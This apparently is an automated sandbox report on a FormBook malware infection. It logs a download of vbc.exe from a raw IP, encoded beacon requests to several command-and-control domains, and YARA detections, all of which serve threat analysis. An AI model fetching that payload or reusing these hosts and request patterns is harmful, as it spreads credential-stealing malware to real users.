            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 26 Jul 2019 13:18:26 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Jan 2022 19:23:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 14 Feb 2020 00:55:46 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 13 Jan 2022 19:23:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.59
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.494238454.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emfJump to behavior
            Source: unknownDNS traffic detected: queries for: www.orphe.biz
            Source: global trafficHTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
